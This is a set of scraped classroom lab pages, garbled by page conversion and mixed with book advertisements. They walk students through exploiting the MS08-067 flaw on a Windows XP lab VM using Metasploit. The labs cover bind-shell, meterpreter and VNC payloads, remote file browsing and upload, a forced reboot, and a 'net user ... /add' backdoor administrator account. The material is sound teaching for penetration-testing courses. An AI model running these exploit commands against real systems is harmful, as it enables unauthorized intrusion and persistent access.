{ Establishing A Shell To The Vulnerable Machine }
Metasploit Toolkit for
Penetration T...
0. Background Information David Maynor, Thom...
Best Price $10.80
1. [Link] or Buy New $43.05
The vulnerability could allow remote code execution if an affected system
received a specially crafted RPC request. On Microsoft Windows 2000, Windows Privacy Information
XP, and Windows Server 2003 systems, an attacker could exploit this
vulnerability without authentication to run arbitrary code. It is possible
that this vulnerability could be used in the crafting of a wormable exploit.
Firewall best practices and standard default firewall configurations can
help protect network resources from attacks that originate outside the
enterprise perimeter.

Metasploit
David Kennedy, Jim...
1. Prerequisite Best Price $26.80
or Buy New $27.87
1. Login to your WindowsVulnerable VM, as username instructor
For those of you that are not part of this class, this is a Windows XP
Privacy Information
machines that is vulnerable to the MS08-067 Vulnerability.

2. On WindowsVulnerable01, obtain the IP Address.


START --> run --> cmd --> ifconfig
In my case, WindowsVulnerable01's IP Address [Link].
BackTrack 4
Shakeel Ali, Tedi ...
Best Price $40.00
or Buy New $47.48

Privacy Information

3. Login to your Backtrack01 VM, as username root


Professional Penetration
Testing
Thomas Wilhelm
Best Price $19.80
or Buy New $66.85

Privacy Information

Penetration Tester's
Open Source Too...
4. startx Jeremy Faircloth, ...

converted by [Link]
Best Price $21.00
Issue the startx command if you are currently are only seeing a console and or Buy New
not a graphical user interface.
Privacy Information

2. Confirm Backtrack01 has an IP Address


1. Fire up a console or terminal window
Writing Security Tools
System --> Konsole and Exploits
James C. Foster, V...
Best Price $7.18
or Buy New $46.50

Privacy Information

Dissecting the Hack


Jayson E. Street, ...
Best Price $14.50
or Buy New $18.78

Privacy Information

2. ifconfig
Example: No IP Address for eth0
If a valid IP address for eth0 is not displayed please move onto step 3.

SSH, The Secure Shell


Daniel J. Barrett,...
Best Price $16.96
or Buy New $27.26

Privacy Information

Example: Valid IP Address for eth0

converted by [Link]
Pro OpenSSH
Michael Stahnke
Best Price $11.57
or Buy New $26.77

Privacy Information

Implementing SSH
Himanshu Dwivedi
Best Price $0.01
or Buy New $35.00

Privacy Information

3. vi /etc/network/interfaces

UNIX Shells by Example


Ellie Quigley
Best Price $22.88
or Buy New $35.78
4. Your file should look similar to the below screen shot
Privacy Information

A Practical Guide to
Linux Commands,...
Mark G. Sobell
Best Price $16.74
or Buy New

5. cd /etc/init.d/
Privacy Information

6. ./networking start

converted by [Link]
Linux Pocket Guide
Daniel J. Barrett
Best Price $0.90
or Buy New

Privacy Information

Linux Administration
Wale Soyinka
Best Price $11.78
or Buy New $19.99

7. Confirm you have a valid IP address for eth0 Privacy Information


In my case, eth0's IP address is [Link].

Beginning Ubuntu Linux


Keir Thomas, Andy ...
Best Price $6.98
or Buy New $29.19

Privacy Information

Practical Guide to
Fedora and Red Ha...
3. Stop Firewall on Backtrack01 Mark G. Sobell
Best Price $2.11
or Buy New
1. Start Firestarter
System --> Firestarter
Privacy Information

Beginning the Linux


Command Line
Sander van Vugt
Best Price $18.89
or Buy New $23.30

Privacy Information

converted by [Link]
2. Click on Stop Firewall

Sun
Paul Sanghera
Best Price $1.97
or Buy New $35.41

Privacy Information

5. Starting up the Metasploit MSF Console Solaris Operating


Environment Boot C...
David Rhodes, Domi...
1. Fire up the MSF Console (See Below) Best Price $0.74
Note It might take a while to start. or Buy New

Privacy Information

AIX 5L Administration
Randal K. Michael
Best Price $15.20
or Buy New $36.22

2. Once MSF Loads (See Below)


Privacy Information

AIX for UNIX


Professionals
Bonnie L. Miller
Best Price $5.62
or Buy New $58.00

Privacy Information

converted by [Link]
6. Searching For Exploits
1. search ms08_067 (See Below)
Below we are searching for any exploits involving Microsoft Advisory MS08-
067.
Only one exploit is returned (windows/smb/ms08_067_netapi) HP-UX
Asghar Ghori
Best Price $46.51
or Buy New $50.52

Privacy Information

7. Using an exploit
HP-UX 11i Version 2
1. use windows/smb/ms08_067_netapi System Administr...
Marty Poniatowski
Best Price $5.36
or Buy New $38.53

8. Selecting a Payload Privacy Information

1. show payloads

BSD UNIX Toolbox


2. Look for windows/shell/bind_tcp Christopher Negus,...
Each name is followed by a brief description Buy New

Privacy Information

3. set PAYLOAD windows/shell_bind_tcp

4. show options
Notice the Required Column. RPORT and SMBPIPE are already populated, but
RHOST is not.
You will populate RHOST with the IP Address of WindowsVulnerable01.

converted by [Link]
5. set RHOST [Link]
Note: Use the IP Address of WindowsVulnerable01

9. Exploit
1. exploit

2. Presto, you should now have a command prompt

3. systeminfo
Proof of Lab: Issue a print screen for proof of lab then paste into a word
document.

converted by [Link]
4. As you can imagine you have pretty much can do anything you want. Let's just do
a simple shutdown.
Command: shutdown -r

5. Migrate Over to WindowsVulnerable01


You will see a shutdown message similar to the below.

Proof of Lab
1. Cut and Paste a screen shot that looks similar to Step #3 in Section 9 into a
word document and upload to Moodle.

converted by [Link]
ComputerSecurityStudent (CSS)
HOME UNIX WINDOWS SECURITY TOOLS LECTURES FORENSICS SHOPPING CONTACT_US

|SECURITY TOOLS >> Metasploit |Views: 1560

(Metasploit: MS08-067)
{ Using the MsfGUI to Grab A Shell and Transfer a File }
Metasploit Toolkit for
Penetration T...
0. Background Information David Maynor, Thom...
Best Price $10.80
1. [Link] or Buy New $43.05
The vulnerability could allow remote code execution if an affected system
received a specially crafted RPC request. On Microsoft Windows 2000, Windows Privacy Information
XP, and Windows Server 2003 systems, an attacker could exploit this
vulnerability without authentication to run arbitrary code. It is possible
that this vulnerability could be used in the crafting of a wormable exploit.
Firewall best practices and standard default firewall configurations can
help protect network resources from attacks that originate outside the
enterprise perimeter.

Metasploit
David Kennedy, Jim...
1. Prerequisite Best Price $26.80
or Buy New $27.87
1. Login to your WindowsVulnerable VM, as username instructor
For those of you that are not part of this class, this is a Windows XP
Privacy Information
machines that is vulnerable to the MS08-067 Vulnerability.

2. On WindowsVulnerable01, obtain the IP Address.


START --> run --> cmd --> ifconfig
In my case, WindowsVulnerable01's IP Address [Link].
BackTrack 4
Shakeel Ali, Tedi ...
Best Price $40.00
or Buy New $47.48

Privacy Information

Professional Penetration
Testing
Thomas Wilhelm
Best Price $19.80
or Buy New $66.85

Privacy Information
3. Login to your Backtrack01 VM, as username root

converted by [Link]
Penetration Tester's
Open Source Too...
Jeremy Faircloth, ...
Best Price $21.00
or Buy New

Privacy Information

4. startx
Issue the startx command if you are currently are only seeing a console and
not a graphical user interface.
Writing Security Tools
and Exploits
James C. Foster, V...
Best Price $7.18
or Buy New $46.50

2. Confirm Backtrack01 has an IP Address Privacy Information

1. Fire up a console or terminal window


System --> Konsole

Dissecting the Hack


Jayson E. Street, ...
Best Price $14.50
or Buy New $18.78

Privacy Information

SSH, The Secure Shell


Daniel J. Barrett,...
Best Price $16.96
or Buy New $27.26
2. ifconfig
Example: No IP Address for eth0
If a valid IP address for eth0 is not displayed please move onto step 3. Privacy Information

Pro OpenSSH
Michael Stahnke
Best Price $11.57
or Buy New $26.77

Privacy Information

Example: Valid IP Address for eth0

converted by [Link]
Implementing SSH
Himanshu Dwivedi
Best Price $0.01
or Buy New $35.00

Privacy Information

UNIX Shells by Example


Ellie Quigley
Best Price $22.88
or Buy New $35.78

Privacy Information

3. vi /etc/network/interfaces

4. Your file should look similar to the below screen shot A Practical Guide to
Linux Commands,...
Mark G. Sobell
Best Price $16.74
or Buy New

Privacy Information

Linux Pocket Guide


Daniel J. Barrett
5. cd /etc/init.d/ Best Price $0.90
or Buy New

Privacy Information

6. ./networking start

converted by [Link]
Linux Administration
Wale Soyinka
Best Price $11.78
or Buy New $19.99

Privacy Information

Beginning Ubuntu Linux


Keir Thomas, Andy ...
7. Confirm you have a valid IP address for eth0 Best Price $6.98
or Buy New $29.19
In my case, eth0's IP address is [Link].

Privacy Information

Practical Guide to
Fedora and Red Ha...
Mark G. Sobell
Best Price $2.11
or Buy New

Privacy Information

Beginning the Linux


Command Line
3. Stop Firewall on Backtrack01 Sander van Vugt
Best Price $18.89
1. Start Firestarter or Buy New $23.30
System --> Firestarter

converted by [Link]
Privacy Information

Unix and Linux System


Administration...
Evi Nemeth, Garth ...

Buy New

Privacy Information

2. Click on Stop Firewall

Sun
Paul Sanghera
Best Price $1.97
or Buy New $35.41

Privacy Information

Solaris Operating
Environment Boot C...
David Rhodes, Domi...
Best Price $0.74
or Buy New

Privacy Information

5. Starting up the Metasploit MsfGUI AIX 5L Administration


Randal K. Michael
1. Fire up the MsfGUI (See Below) Best Price $15.20
Note It might take a while to start. or Buy New $36.22

Privacy Information

converted by [Link]
AIX for UNIX
Professionals
Bonnie L. Miller
Best Price $5.62
or Buy New $58.00

Privacy Information
2. Once the Msf-GUI Loads, you will a similar screen (See Below)

HP-UX
Asghar Ghori
Best Price $46.51
or Buy New $50.52

Privacy Information

6. Searching For Exploits


HP-UX 11i Version 2
System Administr...
1. search ms08_067 (See Below) Marty Poniatowski
Below we are searching for any exploits involving Microsoft Advisory MS08- Best Price $5.36
067. or Buy New $38.53
After inputting MS08-067 into the text box click the Find Button.
Privacy Information

BSD UNIX Toolbox


Christopher Negus,...

Buy New

Privacy Information

2. Only one exploit is returned (ms08_067_netapi)

converted by [Link]
3. Double click on ms08_067_netapi

4. Keep the default, Automatic Targeting, Then Select Forward.

5. Select PAYLOAD windows/reflectivemeterpreter/bind_tcp, Then Click Forward (See


Below)

converted by [Link]
6. Enter WindowsVulnerable01 IP Address into the RHOST text box (See Below)
Then Click Forward.

7. Run Exploit
Confirm Settings
Then Click Apply

converted by [Link]
7. Using the exploit to gain a command prompt
1. Verify Job is Complete
Once the exploit job completes, you will see a session has been established
to the victim IP Address.

2. Establish an Interactive Session


Right Click on highlighted meterpreter session

converted by [Link]
3. Merry Christmas and A Happy Command line prompt

4. Click the Close Button when finished.

8. Using the exploit to browse the victim's directories and files


1. Right Click on the Meterpreter Session
Select Browse

2. Windows Explorer Type of Browser (See Below)


Notice that the left side belongs to Backtrack and the right side belongs to
the Window system.

3. Navigate to the Windows Desktop


Click on the UP Arrow until you get to � C:\�
Click on Documents and Settings

converted by [Link]
Click on All Users
Click on Desktop

9. Create backtrack text file or use your imagination


1. Create File on BackTrack
Minimize all Windows on your BackTrack VM.
Right Click on the BackTrack VM Desktop.
Highlight Create New
Select Text File
NOTE: I am sure you can be more imaginative than a text file; however, we
are being ethical.

2. Enter Filename
Call it "h@[Link]"
Select OK.

3. Double Click on File

4. Select New Session

converted by [Link]
5. Enter text similar to the below.
Make Sure you include your name and date.
For Proof of Lab, do a screen print of this step and submit to Moodle.

10. Transfer File From Backtrack to Windows Victim


1. On Your BackTrack VM
Pull up your msfbrowser (See Below)

2. Click the Up Arrow until you get to "/"


Click on root
Click on Desktop

3. Drag and Drop


Highlight the h@[Link] file on the BackTrack VM Side.
Drag the h@[Link] file to the Window's side.

converted by [Link]
11. Verify File Transfer
1. On WindowsVulnerable01
Search for h@[Link] on the desktop.

2. Verify Contents of Files.


That's All Folks.

Proof of Lab
1. Cut and Paste a screen shot that looks similar to Step #5 in Section 9 into a
word document and upload to Moodle.

converted by [Link]
ComputerSecurityStudent (CSS)
HOME UNIX WINDOWS SECURITY TOOLS LECTURES FORENSICS SHOPPING CONTACT_US

|SECURITY TOOLS >> Metasploit |Views: 1347

(Metasploit: MS08-067)
{ Using the MsfCli to Grab A DOS Command Prompt }
Metasploit Toolkit for
Penetration T...
0. Background Information David Maynor, Thom...
Best Price $10.80
1. What is MSfCli? or Buy New $43.05
Metasploit Command Line Interface allows for exploits to be executed from
the Unix and Windows command line without the need to first launch the Privacy Information
msfconsole.
It is particularly useful when a large number of systems need to be tested
for the same vulnerability.

2. [Link]
The vulnerability could allow remote code execution if an affected system Metasploit
received a specially crafted RPC request. On Microsoft Windows 2000, Windows David Kennedy, Jim...
XP, and Windows Server 2003 systems, an attacker could exploit this Best Price $26.80
vulnerability without authentication to run arbitrary code. It is possible or Buy New $27.87

that this vulnerability could be used in the crafting of a wormable exploit.


Firewall best practices and standard default firewall configurations can
Privacy Information
help protect network resources from attacks that originate outside the
enterprise perimeter.

1. Prerequisite
1. Login to your WindowsVulnerable VM, as username instructor
For those of you that are not part of this class, this is a Windows XP BackTrack 4
Shakeel Ali, Tedi ...
machines that is vulnerable to the MS08-067 Vulnerability. Best Price $40.00
or Buy New $47.48

2. On WindowsVulnerable01, obtain the IP Address. Privacy Information


START --> run --> cmd --> ifconfig
In my case, WindowsVulnerable01's IP Address [Link].

Professional Penetration
Testing
Thomas Wilhelm
Best Price $19.85
or Buy New $66.85

Privacy Information

Penetration Tester's
Open Source Too...
3. Login to your Backtrack01 VM, as username root Jeremy Faircloth, ...

converted by [Link]
Best Price $21.00
or Buy New

Privacy Information

Writing Security Tools


and Exploits
James C. Foster, V...
Best Price $7.18
or Buy New $46.50

4. startx Privacy Information


Issue the startx command if you are currently are only seeing a console and
not a graphical user interface.

Dissecting the Hack


2. Confirm Backtrack01 has an IP Address Jayson E. Street, ...
Best Price $14.50
or Buy New $18.78
1. Fire up a console or terminal window
System --> Konsole
Privacy Information

SSH, The Secure Shell


Daniel J. Barrett,...
Best Price $16.96
or Buy New $27.26

Privacy Information

2. ifconfig
Example: No IP Address for eth0 Pro OpenSSH
If a valid IP address for eth0 is not displayed please move onto step 3. Michael Stahnke
Best Price $11.57
or Buy New $26.77

Privacy Information

Implementing SSH
Himanshu Dwivedi
Best Price $0.01
or Buy New $35.00
Example: Valid IP Address for eth0

converted by [Link]
Privacy Information

UNIX Shells by Example


Ellie Quigley
Best Price $22.88
or Buy New $35.78

Privacy Information

A Practical Guide to
Linux Commands,...
Mark G. Sobell
3. vi /etc/network/interfaces Best Price $16.74
or Buy New

Privacy Information

4. Your file should look similar to the below screen shot

Linux Pocket Guide


Daniel J. Barrett
Best Price $0.90
or Buy New

Privacy Information

5. cd /etc/init.d/

Linux Administration
Wale Soyinka
6. ./networking start Best Price $11.78

converted by [Link]
or Buy New $19.99

Privacy Information

Beginning Ubuntu Linux


Keir Thomas, Andy ...
Best Price $6.98
or Buy New $29.19

Privacy Information

7. Confirm you have a valid IP address for eth0


In my case, eth0's IP address is [Link].

Practical Guide to
Fedora and Red Ha...
Mark G. Sobell
Best Price $2.11
or Buy New

Privacy Information

Beginning the Linux


Command Line
Sander van Vugt
Best Price $18.89
or Buy New $23.30

Privacy Information

3. Stop Firewall on Backtrack01


1. Start Firestarter
System --> Firestarter

converted by [Link]
Unix and Linux System
Administration...
Evi Nemeth, Garth ...

Buy New

Privacy Information

Sun
Paul Sanghera
Best Price $1.97
or Buy New $35.41

Privacy Information
2. Click on Stop Firewall

Solaris Operating
Environment Boot C...
David Rhodes, Domi...
Best Price $0.74
or Buy New

Privacy Information

AIX 5L Administration
Randal K. Michael
Best Price $15.20
or Buy New $36.22

Privacy Information

4. Starting up the Metasploit MsfCli


1. Fire up the MsfCli (See Below)
Note It might take a while to start.

AIX for UNIX


Professionals
Bonnie L. Miller
Best Price $5.62
or Buy New $58.00

Privacy Information

converted by [Link]
HP-UX
2. Once MsfCli Loads, you will a similar screen (See Below) Asghar Ghori
Best Price $46.51
or Buy New $50.52

Privacy Information

HP-UX 11i Version 2


5. Using MsfCli to retrieve information about a particular exploit System Administr...
Marty Poniatowski
Best Price $5.36
or Buy New $38.53
1. Issue the below command (See Below)
Command: ./msfcli windows/smb/ms08_067_netapi S
Privacy Information

BSD UNIX Toolbox


Christopher Negus,...

Buy New
2. Basically, you will what Operating Systems are affected by the exploit, the
required options, and a brief description (See Below)
Privacy Information

6. Using MsfCli to retrieve PAYLOAD information about a particular exploit

converted by [Link]
1. Issue the below command (See Below)
Command: ./msfcli windows/smb/ms08_067_netapi P

2. You will see all the payloads that are associated with
windows/smb/ms08_067_netapi. (See Below)

7. Using MsfCli to SHOW OPTIONS for the particular exploit

1. Issue the below command (See Below)


Command: ./msfcli windows/smb/ms08_067_netapi PAYLOAD=windows/shell_bind_tcp O

2. You will see all the options for the particular payload for exploit
windows/smb/ms08_067_netapi. (See Below)

converted by [Link]
8. Executing Exploit from MsfCli Command line
1. Issue the below command (See Below)
./msfcli windows/smb/ms08_067_netapi PAYLOAD=windows/shell_bind_tcp
RHOST=[Link] E
"windows/smb/ms08_067_netapi" - is the MS08-067 exploit.

"windows/shell_bind_tcp" - is the payload to provide a command line


interface to Windows.

"[Link]" - is the IP Address of WindowsVulnerable01. In your


case, it will probably be different.

"E" - means to exploit.

2. If exploit is successful, you will see the below Windows Command Line Interface.

converted by [Link]
3. From the Windows Command Line, issue both the date and time command (See Below).
Proof of Lab: Issue and screen print, paste into a word document, and upload
to Moodle.

Proof of Lab
1. Cut and Paste a screen shot that looks similar to Step #3 in Section 8 into a
word document and upload to Moodle.

converted by [Link]
ComputerSecurityStudent (CSS)
HOME UNIX WINDOWS SECURITY TOOLS LECTURES FORENSICS SHOPPING CONTACT_US

|SECURITY TOOLS >> Metasploit |Views: 1381

(Metasploit: MS08-067)
{ Establishing A VNCShell To The Vulnerable Machine }
Metasploit Toolkit for
Penetration T...
0. Background Information David Maynor, Thom...
Best Price $10.80
1. [Link] or Buy New $43.05
The vulnerability could allow remote code execution if an affected system
received a specially crafted RPC request. On Microsoft Windows 2000, Windows Privacy Information
XP, and Windows Server 2003 systems, an attacker could exploit this
vulnerability without authentication to run arbitrary code. It is possible
that this vulnerability could be used in the crafting of a wormable exploit.
Firewall best practices and standard default firewall configurations can
help protect network resources from attacks that originate outside the
enterprise perimeter.

Metasploit
David Kennedy, Jim...
1. Prerequisite Best Price $26.80
or Buy New $27.87
1. Login to your WindowsVulnerable VM, as username instructor
For those of you that are not part of this class, this is a Windows XP
Privacy Information
machines that is vulnerable to the MS08-067 Vulnerability.

2. On WindowsVulnerable01, obtain the IP Address.


START --> run --> cmd --> ifconfig
In my case, WindowsVulnerable01's IP Address [Link].
BackTrack 4
Shakeel Ali, Tedi ...
Best Price $40.00
or Buy New $47.48

Privacy Information

Professional Penetration
Testing
Thomas Wilhelm
Best Price $19.85
or Buy New $66.85

Privacy Information
3. Login to your Backtrack01 VM, as username root

converted by [Link]
Penetration Tester's
Open Source Too...
Jeremy Faircloth, ...
Best Price $21.00
or Buy New

Privacy Information

4. startx
Issue the startx command if you are currently are only seeing a console and
not a graphical user interface.
Writing Security Tools
and Exploits
James C. Foster, V...
Best Price $7.18
or Buy New $46.50

2. Confirm Backtrack01 has an IP Address Privacy Information

1. Fire up a console or terminal window


System --> Konsole

Dissecting the Hack


Jayson E. Street, ...
Best Price $14.50
or Buy New $18.78

Privacy Information

SSH, The Secure Shell


Daniel J. Barrett,...
Best Price $16.96
or Buy New $27.26
2. ifconfig
Example: No IP Address for eth0
If a valid IP address for eth0 is not displayed please move onto step 3. Privacy Information

Pro OpenSSH
Michael Stahnke
Best Price $11.57
or Buy New $26.77

Privacy Information

Example: Valid IP Address for eth0

converted by [Link]
Implementing SSH
Himanshu Dwivedi
Best Price $0.01
or Buy New $35.00

Privacy Information

UNIX Shells by Example


Ellie Quigley
Best Price $22.88
or Buy New $35.78

3. vi /etc/network/interfaces Privacy Information

4. Your file should look similar to the below screen shot

A Practical Guide to
Linux Commands,...
Mark G. Sobell
Best Price $16.74
or Buy New

Privacy Information

5. cd /etc/init.d/
Linux Pocket Guide
Daniel J. Barrett
Best Price $0.90
or Buy New

6. ./networking start

converted by [Link]
Privacy Information

Linux Administration
Wale Soyinka
Best Price $11.78
or Buy New $19.99

Privacy Information

Beginning Ubuntu Linux


Keir Thomas, Andy ...
7. Confirm you have a valid IP address for eth0 Best Price $6.99
or Buy New $29.19
In my case, eth0's IP address is [Link].

Privacy Information

Practical Guide to
Fedora and Red Ha...
Mark G. Sobell
Best Price $2.11
or Buy New

Privacy Information

3. Stop Firewall on Backtrack01


Beginning the Linux
1. Start Firestarter Command Line
System --> Firestarter Sander van Vugt

converted by [Link]
Best Price $18.89
or Buy New $23.30

Privacy Information

Unix and Linux System


Administration...
Evi Nemeth, Garth ...

Buy New

Privacy Information

2. Click on Stop Firewall

Sun
Paul Sanghera
Best Price $1.97
or Buy New $35.41

Privacy Information

Solaris Operating
Environment Boot C...
David Rhodes, Domi...
Best Price $0.74
or Buy New

Privacy Information

5. Starting up the Metasploit MSF Console


1. Fire up the MSF Console (See Below)
Note It might take a while to start. AIX 5L Administration
Randal K. Michael
Best Price $15.20
or Buy New $36.22

Privacy Information

converted by [Link]
AIX for UNIX
Professionals
2. Once MSF Loads (See Below) Bonnie L. Miller
Best Price $5.62
or Buy New $58.00

Privacy Information

HP-UX
Asghar Ghori
Best Price $46.51
or Buy New $50.52

Privacy Information
6. Searching For Exploits
1. search ms08_067 (See Below)
Below we are searching for any exploits involving Microsoft Advisory MS08-
067.
Only one exploit is returned (windows/smb/ms08_067_netapi)

HP-UX 11i Version 2


System Administr...
Marty Poniatowski
Best Price $5.36
or Buy New $38.53

Privacy Information

7. Using an exploit
1. use windows/smb/ms08_067_netapi

BSD UNIX Toolbox


Christopher Negus,...

8. Selecting a Payload Buy New

1. show payloads
Privacy Information

2. Look for windows/vncinject/bind_tcp


Each name is followed by a brief description

converted by [Link]
3. set PAYLOAD windows/vncinject/bind_tcp

4. show options
Notice the Required Column. RPORT and SMBPIPE are already populated, but
RHOST is not.
You will populate RHOST with the IP Address of WindowsVulnerable01.

5. set RHOST [Link]


Note: Use the IP Address of WindowsVulnerable01

9. Exploit a windows machine that is "not" locked


1. exploit

2. Presto, The VNC Server is open and a VNC client session with a remote command
shell will be launched shortly.

converted by [Link]
3. VNC Shell Session
Proof of Lab:
From the remote command shell, type date and press enter twice.
Do a PrtScn, Cut and Paste into a word document, and Upload to Moodle.

4. Close VNC Shell

converted by [Link]
10. Exploit a "locked" windows machine

1. Make sure the WindowsVulnerable01 is locked.


Remember for VMware you cannot just simple press Ctrl+Alt+Del you can from a
typical Windows client.

Remember to Click on the Lock Computer Button.

Verify WindowsVulnerable01 is locked.

2. Fire up the MSF Console (See Below)


Note It might take a while to start.

converted by [Link]
3. Once MSF Loads (See Below)

4. search ms08_067 (See Below)


Below we are searching for any exploits involving Microsoft Advisory MS08-
067.
Only one exploit is returned (windows/smb/ms08_067_netapi)

4. show payloads

5. Look for windows/vncinject/bind_tcp


Each name is followed by a brief description

converted by [Link]
6. set PAYLOAD windows/shell_bind_tcp

7. show options
Notice the Required Column. RPORT and SMBPIPE are already populated, but
RHOST is not.
You will populate RHOST with the IP Address of WindowsVulnerable01.

8. set RHOST [Link]


Note: Use the IP Address of WindowsVulnerable01

9. exploit

10. In the Metasploit Courtesy Shell, create a user and add to groups (See Below)
Command: net user hacker33 abc123 /add
Username: hacker33
Password: abc123

Command: net localgroup administrator hacker33 /add


Add username hacker33 to the groups localgroup and administrator

converted by [Link]
11. Minimize the Metasploit Courtesy Shell (See Below)
Click the minimize button.

12. Login user your newly created username (hacker33) and password (abc123)
Note: At the very bottom of the screen you will see minimized command shell
prompt.

converted by [Link]
13. Select OK (See Below)

14. Now login again as user hacker with password abc123.


Note: If you cannot get in, or your screen hangs, go to step 15.

converted by [Link]
15. Close the VNCShell Windows, by click on the Red X, then clicking Close.

16. Go back to your previous MSF prompt.


Press Enter to see MSF Prompt
The Press the up arrow, which will prompt the word exploit.
Press enter.

17. Shazam. You are in.

converted by [Link]
Proof of Lab
1. Cut and Paste a screen shot that looks similar to Step #3 in Section 9 into a
word document and upload to Moodle.

converted by [Link]
ComputerSecurityStudent (CSS)
HOME UNIX WINDOWS SECURITY TOOLS LECTURES FORENSICS SHOPPING CONTACT_US

|SECURITY TOOLS >> Metasploit |Views: 1419

(Metasploit: Getting Started on Backtrack 4)


{ Configure IP Address, Starting MSF Console }
Metasploit Toolkit for
Penetration T...
1. Logging into Backtrack01 David Maynor, Thom...
Best Price $10.80
1. Login to your Backtrack01 VM, as username root or Buy New $43.05

Privacy Information

Metasploit
David Kennedy, Jim...
Best Price $26.80
or Buy New $27.87

Privacy Information
2. startx
Issue the startx command if you are currently are only seeing a console and
not a graphical user interface.

BackTrack 4
Shakeel Ali, Tedi ...
Best Price $40.00
2. Confirm Backtrack01 has an IP Address or Buy New $47.48

1. Fire up a console or terminal window


System --> Konsole Privacy Information

Professional Penetration
Testing
Thomas Wilhelm
Best Price $19.85
or Buy New $66.85

Privacy Information

2. ifconfig Penetration Tester's


Example: No IP Address for eth0 Open Source Too...
Jeremy Faircloth, ...
If a valid IP address for eth0 is not displayed please move onto step 3. Best Price $21.00

converted by [Link]
Best Price $21.00
or Buy New

Privacy Information

Writing Security Tools


and Exploits
James C. Foster, V...
Best Price $7.18
or Buy New $46.50
Example: Valid IP Address for eth0
Privacy Information

Dissecting the Hack


Jayson E. Street, ...
Best Price $14.50
or Buy New $18.78

Privacy Information

SSH, The Secure Shell


Daniel J. Barrett,...
3. vi /etc/network/interfaces Best Price $16.96
or Buy New $27.26

Privacy Information

4. Your file should look similar to the below screen shot

Pro OpenSSH
Michael Stahnke
Best Price $11.57
or Buy New $26.77

Privacy Information

5. cd /etc/init.d/

Implementing SSH
Himanshu Dwivedi
Best Price $0.01
or Buy New $35.00
6. ./networking start

converted by [Link]
Privacy Information

UNIX Shells by Example


Ellie Quigley
Best Price $22.88
or Buy New $35.78

Privacy Information

A Practical Guide to
Linux Commands,...
7. Confirm you have a valid IP address for eth0 Mark G. Sobell
In my case, eth0's IP address is [Link]. Best Price $16.74
or Buy New

Privacy Information

Linux Pocket Guide


Daniel J. Barrett
Best Price $0.90
or Buy New

Privacy Information

3. Stop Firewall on Backtrack01


1. Start Firestarter Linux Administration
Wale Soyinka
System --> Firestarter

converted by [Link]
Best Price $11.78
or Buy New $19.99

Privacy Information

Beginning Ubuntu Linux


Keir Thomas, Andy ...
Best Price $6.99
or Buy New $29.19

Privacy Information

2. Click on Stop Firewall

Practical Guide to
Fedora and Red Ha...
Mark G. Sobell
Best Price $2.11
or Buy New

Privacy Information

Beginning the Linux


Command Line
Sander van Vugt
Best Price $18.89
or Buy New $23.30

Privacy Information

5. Starting up the Metasploit MSF Console


1. Fire up the MSF Console (See Below)
Note It might take a while to start. Unix and Linux System
Administration...
Evi Nemeth, Garth ...

Buy New

Privacy Information

2. Once MSF Loads (See Below)

converted by [Link]
converted by [Link]
ComputerSecurityStudent (CSS)
HOME UNIX WINDOWS SECURITY TOOLS LECTURES FORENSICS SHOPPING CONTACT_US

|SECURITY TOOLS >> Metasploit |Views: 1238

(Metasploit: MS08-067)
{ BackTrack5R1: Establishing A Shell To The Vulnerable Machine }
Metasploit Toolkit for
Penetration T...
0. Background Information David Maynor, Thom...
Best Price $10.80
1. [Link] or Buy New $43.05
The vulnerability could allow remote code execution if an affected system
received a specially crafted RPC request. On Microsoft Windows 2000, Windows Privacy Information
XP, and Windows Server 2003 systems, an attacker could exploit this
vulnerability without authentication to run arbitrary code. It is possible
that this vulnerability could be used in the crafting of a wormable exploit.
Firewall best practices and standard default firewall configurations can
help protect network resources from attacks that originate outside the
enterprise perimeter.

Metasploit
David Kennedy, Jim...
1. Log into Vulnerable Windows Machine Best Price $26.80
or Buy New $27.87
1. Start Up WindowsVulerable01.
Instructions:
Privacy Information
1. Start Up your VMware Player
2. Play virtual machine
Note:
For those of you not part of my class, this is a Windows XP machine
running SP2.

BackTrack 4
Shakeel Ali, Tedi ...
Best Price $40.00
or Buy New $47.48

Privacy Information

Professional Penetration
Testing
Thomas Wilhelm
Best Price $19.80
or Buy New $66.85

Privacy Information

Penetration Tester's
Open Source Too...
2. Logging into WindowsVulerable01. Jeremy Faircloth, ...
Instructions: Best Price $21.00

converted by [Link]
1. Username: administrator or Buy New
2. Password: Use the Class Password or whatever you set it.
Privacy Information

Writing Security Tools


and Exploits
James C. Foster, V...
Best Price $7.18
or Buy New $46.50

Privacy Information

Dissecting the Hack


Jayson E. Street, ...
Best Price $14.50
or Buy New $18.78

Privacy Information

3. Logging into WindowsVulerable01.


Instructions:
1. Start --> Command Prompt

SSH, The Secure Shell


Daniel J. Barrett,...
Best Price $16.96
or Buy New $27.26

Privacy Information

Pro OpenSSH
Michael Stahnke
Best Price $11.57
or Buy New $26.77

Privacy Information

4. On WindowsVulnerable01, obtain the IP Address. Implementing SSH


Instructions: Himanshu Dwivedi
1. In the Command Prompt type "ipconfig" Best Price $0.01
or Buy New $35.00
Note:
In my case, WindowsVulnerable01's IP Address [Link].
This is the IP Address of the Victim Machine.

converted by [Link]
Privacy Information

UNIX Shells by Example


Ellie Quigley
Best Price $22.88
or Buy New $35.78

Privacy Information

A Practical Guide to
Linux Commands,...
Mark G. Sobell
Best Price $16.74
or Buy New

Privacy Information

2. Log into BackTrack5


1. Start Up BackTrack5R1.
Instructions:
1. Start Up your VMware Player
2. Play virtual machine
Linux Pocket Guide
Daniel J. Barrett
Best Price $0.90
or Buy New

Privacy Information

Linux Administration
Wale Soyinka
Best Price $11.78
or Buy New $19.99

Privacy Information

Beginning Ubuntu Linux


Keir Thomas, Andy ...
2. Login to BackTrack Best Price $6.98
Instructions: or Buy New $29.19
1. Login: root
2. Password: toor or <whatever you changed it to>.

converted by [Link]
Privacy Information

Practical Guide to
Fedora and Red Ha...
Mark G. Sobell
Best Price $2.11
or Buy New

Privacy Information

Beginning the Linux


Command Line
Sander van Vugt
Best Price $18.89
or Buy New $23.30

Privacy Information
3. Bring up the GNOME
Instructions:
1. Type startx

Unix and Linux System


Administration...
Evi Nemeth, Garth ...

Buy New

Privacy Information

Sun
Paul Sanghera
Best Price $1.97
or Buy New $35.41

Privacy Information
4. Start up a terminal window
Instructions:
1. Click on the Terminal Window

converted by [Link]
Solaris Operating
Environment Boot C...
David Rhodes, Domi...
Best Price $0.74
or Buy New

Privacy Information

AIX 5L Administration
Randal K. Michael
Best Price $15.20
or Buy New $36.22

Privacy Information

5. Obtain the IP Address


Instructions:
1. ifconfig -a
Notes:
My IP address [Link]. In your case, it will probably be AIX for UNIX
different. Professionals
Bonnie L. Miller
